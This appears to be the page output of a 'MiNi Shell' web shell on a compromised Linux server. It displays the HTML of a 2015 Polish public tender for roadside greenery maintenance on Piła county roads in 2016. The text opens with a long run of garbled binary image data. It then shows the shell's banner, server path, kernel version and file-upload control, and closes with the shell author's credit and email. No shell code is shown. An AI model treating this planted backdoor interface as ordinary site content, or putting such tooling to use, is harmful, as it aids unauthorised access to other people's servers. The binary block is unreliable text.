JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20151130/175713-N-2015.html

<p class="kh_header"><b>Piła: Letnie utrzymanie dróg powiatowych w roku 2016 - utrzymanie zieleni</b><br>
<b>Numer ogłoszenia: 175713 - 2015; data zamieszczenia: 30.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Pilski reprezentowany przez Zarząd Powiatu w Pile , al. Niepodległości 33/35, 64-920 Piła, woj. wielkopolskie, tel. 67 2109442, faks 067 2109332.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.pila.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Letnie utrzymanie dróg powiatowych w roku 2016 - utrzymanie zieleni.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są usługi: Letnie utrzymanie dróg powiatowych w roku 2016 - utrzymanie zieleni.
2.	W skład przedmiotu zamówienia wchodzi utrzymanie zieleni związane z letnim utrzymaniem sieci dróg powiatowych na terenie Powiatu Pilskiego. Drogi powiatowe na terenie miasta Piły nie są przedmiotem zamówienia.
		Zamówienie przewiduje utrzymanie dróg powiatowych na terenie ośmiu gmin w Powiecie Pilskim, w tym dróg zamiejskich i dróg miejskich.  
3.	W skład przedmiotu zamówienia wchodzą następujące rodzaje usług: 
1)	koszenie poboczy dróg, skarp i przeciwskarp rowów odwadniających,
2)	wycinka drzew,
3)	karczowanie pni po ściętych drzewach, 
4)	frezowanie pni po ściętych drzewach do poziomu pobocza,
5)	wycinka krzewów lub drzewek, których wiek nie przekracza 10 lat,
6)	usuwanie konarów drzew,
7)	podkrzesywanie gałęzi drzew do wysokości skrajni drogi,
8)	wycinka odrostów drzew.
Specyfikacja techniczna dotycząca przedmiotu zamówienia stanowi Załącznik nr 9 do SIWZ. 
4. 	Wykonanie powyższych prac wiąże się jednocześnie z uporządkowaniem terenu, na którym wykonane zostały prace tj: wywóz drewna, wywóz lub zrębakowanie krzewów/gałęzi, uzupełnienie gruntu po karczowanym pniaku). W ramach zamówienia Wykonawca zobowiązany jest również do wykonania wszelkich prac przygotowawczych, porządkowych, zagospodarowania odpadów powstałych w trakcie wykonywania prac.    
5. 	Wykonawca jest zobowiązany do zakupienia od zamawiającego i zagospodarowania we własnym zakresie pozyskanego z wycinki drewna w cenie:
	1) drewno z gatunków liściastych (oprócz topoli i lipy) - 100 zł/m3,
	2) drewno z gatunków iglastych - 80 zł/m3,
	3) drewno ze wszelkich odmian topoli i lipy - 60 zł/m3.   
6.	Wykonawca jest zobowiązany do sporządzenia protokołu z obmiaru pozyskanej masy drzewnej i przedstawienia go do akceptacji komisji. 
7.	Prace będące przedmiotem zamówienia będą zlecane każdorazowo w miarę potrzeb. Przewidywany zakres prac został określony w Załączniku nr 2 do SIWZ - Formularz cenowy. Wskazane ilości są ilościami szacunkowymi służącymi do obliczenia ceny oferty, porównania złożonych ofert oraz wyłonienia Wykonawcy. Zamawiający informuje, że wielkość środków finansowych przeznaczonych na realizację zamówienia jest określona planem finansowym. 
8. 	Wszystkie roboty będące przedmiotem zamówienia będą wykonywane na podstawie pisemnych zleceń dyrektora lub upoważnionego pracownika Powiatowego Zarządu Dróg w Pile, w których każdorazowo zostanie określone miejsce wykonania prac, ich zakres oraz termin wykonania. W sytuacjach awaryjnych, gdzie występuje w ruchu drogowym zagrożenie dla zdrowia i życia dopuszcza się zlecenia ustne, które jednak niezwłocznie muszą być potwierdzone pisemnie. Podstawą rozliczenia prac będą ceny jednostkowe podane przez Wykonawcę w formularzu cenowym, który będzie stanowił załącznik do umowy.
9. W przypadku wystąpienia w ruchu drogowym zagrożenia dla zdrowia i życia Wykonawca przystąpi do wykonania robót w ciągu 3 godzin od momentu zgłoszenia przez dyrektora lub upoważnionego pracownika Powiatowego Zarządu Dróg w Pile.
10. 	Zakres prac określony w jednym zleceniu podlega odbiorowi. Gotowość do odbioru wykonanych prac należy zgłaszać pisemnie do Powiatowego Zarządu Dróg w Pile. Odbiór prac zostanie dokonany przez komisję w terminie do 10 dni od zgłoszenia gotowości do odbioru przez Wykonawcę.    
11.	Wykonawca jest zobowiązany do utrzymania ruchu publicznego na drogach w trakcie wykonywania robót objętych zamówieniem. 
12. 	Wykonawca winien dysponować znakami pionowymi i innymi urządzeniami zabezpieczającymi na czas realizacji prac w celu zgodnego z przepisami oznakowania prowadzonych prac. Koszt zabezpieczenia znaków i urządzeń a także ich demontażu wliczony winien być w cenę oferty.
13.	W trakcie realizacji prac Wykonawca stosował będzie wszystkie wymagania określone w ustawie o ochronie środowiska.
14.	Zgłoszone przez dyrektora lub upoważnionego pracownika Powiatowego Zarządu Dróg w Pile uwagi, co do jakości wykonywanych prac winny być usuwane na bieżąco nie później jednak niż w ciągu 7 dni od dnia zgłoszenia.
15.	Warunki płatności:
	- za wykonanie prac ujętych w jednym zleceniu Wykonawca wystawi osobną fakturę. Podstawą do wystawienia faktury będzie protokół odbioru; Załącznikiem do każdej faktury za wycinkę drzew będzie zapłacony rachunek za pozyskany materiał drzewny;  
	- wynagrodzenie Wykonawcy stanowić będzie iloczyn ilości jednostek obmiarowych prac odebranych przez Zamawiającego i cen jednostkowych brutto podanych w formularzu cenowym Wykonawcy;
	- Płatnikiem faktury jest Powiatowy Zarząd Dróg w Pile. 
16.	Zamawiający dzieli przedmiot zamówienia na dwie części. 
Wykonawca może złożyć ofertę na jedną lub dwie części zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających 
na podstawie art. 67 ust. 1 pkt 6 ustawy - Prawo zamówień publicznych - w okresie 3 lat od udzielenia zamówienia podstawowego, udzielenie dotychczasowemu Wykonawcy usług zamówień uzupełniających, stanowiących nie więcej niż 50% wartości zamówienia podstawowego, polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6, 77.21.15.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien posiadać niezbędną wiedzę i doświadczenie. Wykonawca w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie zrealizował usługi związane z utrzymaniem zieleni (m. in. koszenie poboczy, wycinka drzew, krzewów, karczowanie pni, podkrzesywanie gałęzi)   na poboczach dróg na wartość:
1) w przypadku ubiegania się o udzielenie zamówienia na jedną część zamówienia - co najmniej 100 000 złotych,
2) w przypadku ubiegania się o udzielenie zamówienia na dwie części zamówienia - co najmniej 200 000 złotych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować w pełni sprawnym następującym sprzętem:
1) 	ciągnik z przyczepą - 1 szt.,
2) 	kosiarka bijakowa - 1 szt.,
3) 	kosy spalinowe - 2 szt.,
4) 	piły spalinowe - 2 szt.,
5) 	podnośnik hydrauliczny (kosz) - 1 szt.,
6) 	frezarka lub karczownik do pni - 1 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi mieć do dyspozycji odpowiednio wykwalifikowane osoby zdolne wykonać zamówienie. Wykonawca zobowiązany jest dysponować:
1) 	2 osobami posiadającymi ważne uprawnienia do obsługi pilarek;  
2)	1 osobą - operatorem podnośnika hydraulicznego typu kosz, posiadającą ważne uprawnienia do obsługi tego typu sprzętu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony formularz Oferta - Załącznik nr 1 do SIWZ.
2.	Wypełniony Formularz cenowy - Załącznik nr 2 do SIWZ. W przypadku ubiegania się o udzielenie zamówienia na część pierwszą zamówienia - Załącznik nr 2A do SIWZ, w przypadku ubiegania się udzielenie zamówienia na część drugą zamówienia - Załącznik nr 2B do SIWZ.
3.	Pełnomocnictwo do złożenia oferty jeżeli forma reprezentacji nie wynika 
z dokumentów załączonych do oferty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności faktury - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.pila.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Pile
al. Niepodległości 33/35
64-920 Piła
pokój 314.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.12.2015 godzina 10:00, miejsce: Starostwo Powiatowe w Pile
al. Niepodległości 33/35
64-920 Piła
pokój 111.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część pierwsza zamówienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Utrzymanie dróg na terenie gmin: Szydłowo, Ujście i Kaczory. 
Są to następujące drogi:
a)	na terenie gminy Szydłowo (89,944 km):
1.	1159P	Kotuń-Piła
2.	1070P	gr. województwa-Płytnica-Krępsko 
3.	1163P	Róża Wielka-Stacja Stobno 
4.	1164P	Zawada-Dolaszewo-Kotuń-St. Stobno- granica powiatu
5.	1166P	Róża Wielka-Pokrzywnica-Szydłowo-St. Łubianka
6.	1167P	Gr. województwa-Róża Wlk.-Róża Mała-do dr. woj. nr 178 
7.	1168P	Gr. województwa-Skrzatusz-Szydłowo
8.	1169P	Gr. województwa-Skrzatusz
9.	1170P	Gr. województwa-Skrzatusz
10.	1171P	Gr. województwa-Tarnowo-dr. powiatowa nr 1208P
11.	1172P	Stara Łubianka-Dobrzyca
12.	1173P	Zawada-Piła
13.	1174P	Dr.woj. 179-Nowy Dwór-Leżenica
14.	1208P	Stara Łubianka-Krępsko 
b)	na terenie gminy Ujście (33,787 km):
1.	1160P	Ujście-Byszki-Dziembowo-Morzewo-Kaczory
2.	1161P	Piła-Kalina-Byszki
3.	1162P	Jabłonowo-Węglewo
4.	1175P	Dr. woj. nr 182-Nowa Wieś Ujska-Nietuszkowo
 (gr. powiatu w m. Chrustowo)
5.	1176P	Ujście-Nowa Wieś Ujska
6.	1209P	Czarnków-Walkowice-gr. pow. pilskiego-Mirosław
7.	1329P	Stobno-Ługi Ujskie
8.	1334P	Romanowo Górne-Kruszewo-gr. pow. Marunowo 
(w granicach powiatu)
c)	na terenie gminy Kaczory (48,786 km):
1.	1160P	Ujście-Byszki-Dziembowo-Morzewo-Kaczory
2.	1177P	Piła-Zelgniewo-Śmiłowo-Kaczory-Chodzież
3.	1178P	Brodna-skrzyż. z dr. pow. nr 1177P
4.	1179P	Równopole-Rzadkowo
5.	1180P	Kaczory-M.Krajeńskie-Białośliwie-Osiek n. Notecią-Dąbki
6.	1229P	Piła-Leszków-Kaczory..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6, 77.21.15.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktury - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część druga zamówienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Letnie utrzymanie dróg na terenie gmin: Białośliwie, Łobżenica, Miasteczko Krajeńskie, Wyrzysk, Wysoka.
Są to następujące drogi:
a)	na terenie gminy Białośliwie (20,457 km):
1.	1180P	Kaczory-M.Krajeńskie-Białośliwie-Osiek n. Notecią-Dąbki
2.	1185P	Dębówko Nowe-Dębówko Stare
3.	1186P	Czajcze-Młotkowo-Jeziorki Kosztowskie-Nieżychowo-Białośliwie
4.	1187P	Dworzakowo-Białośliwie
b)	na terenie gminy Łobżenica (77,370 km):
1.	1038P	Lipka-Osowo-Rudna-gr.powiatu-Łobżenica
2.	1052P	Kleszczyna-Łobżenica
3.	1191P	Liszkowo-Glesno-Ruda-Dąbki-Żelazno
4.	1195P	Szczerbin-Kościerzyn Mały
5.	1197P	Wiktorówko-Wysoka
6.	1198P	Kijaszkowo-Kunowo-Łobżenica
7.	1199P	Walentynowo-Piesna-Wiktorówko
8.	1200P	Luchowo-Witrogoszcz-Dźwierszno
9.	1201P	Gródek Krajeński-Dźwierszno Małe
10.	1202P	Dźwierszno Małe-Dębno-
gr. województwa
11.	1203P	Topola-gr. województwa
12.	1204P	Liszkowo-gr. województwa
13.	1205P	Łobżenica-Liszkowo-Dębno-Dziunin-gr. województwa
14.	1206P	Dziunin-gr. województwa
15.	1207P	Luchowo-Chlebno
16.	1233P	Łobżenica (ul. Sikorskiego)
c)	na terenie gminy Miasteczko Krajeńskie (22,460 km):
1.	1180P	Kaczory-M.Krajeńskie-Białośliwie-Osiek n. Notecią-Dąbki
2.	1182P	Rudna-Mościska-Grabówno-Miasteczko Krajeńskie
3.	1183P	Miasteczko Krajeńskie-Wolsko
4.	1184P	Wysoka-Grabówno
d)	na terenie gminy Wyrzysk (40,794 km):
1.	1180P	Kaczory-M.Krajeńskie-Białośliwie-Osiek n. Notecią-Dąbki
2.	1188P	Kosztowo-Rzęszkowo
3.	1189P	Wyrzysk-Polanowo
4.	1190P	Konstantynowo-Osiek n./Not.
5.	1191P	Liszkowo-Glesno-Ruda-Dąbki-Żelazno
6.	1192P	Glesno-Wyrzysk
7.	1193P	Od dr. woj. nr 242-Kościerzyn Wlk.-Wyrzysk
8.	1196P	Dr. powiatowa nr 1191P-Auguścin
e)	na terenie gminy Wysoka (42,304 km):
1.	1060P	Głubczyn-Wysoka
2.	1181P	Gmurowo-Stare
3.	1182P	Rudna-Mościska-Grabówno-Miasteczko Krajeńskie
4.	1184P	Wysoka-Grabówno
5.	1186P	Czajcze-Młotkowo-Jeziorki Kosztowskie-Nieżychowo-Białośliwie
6.	1197P	Wiktorówko-Wysoka
7.	1198P	Kijaszkowo-Kunowo-Łobżenica..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6, 77.21.15.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktury - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com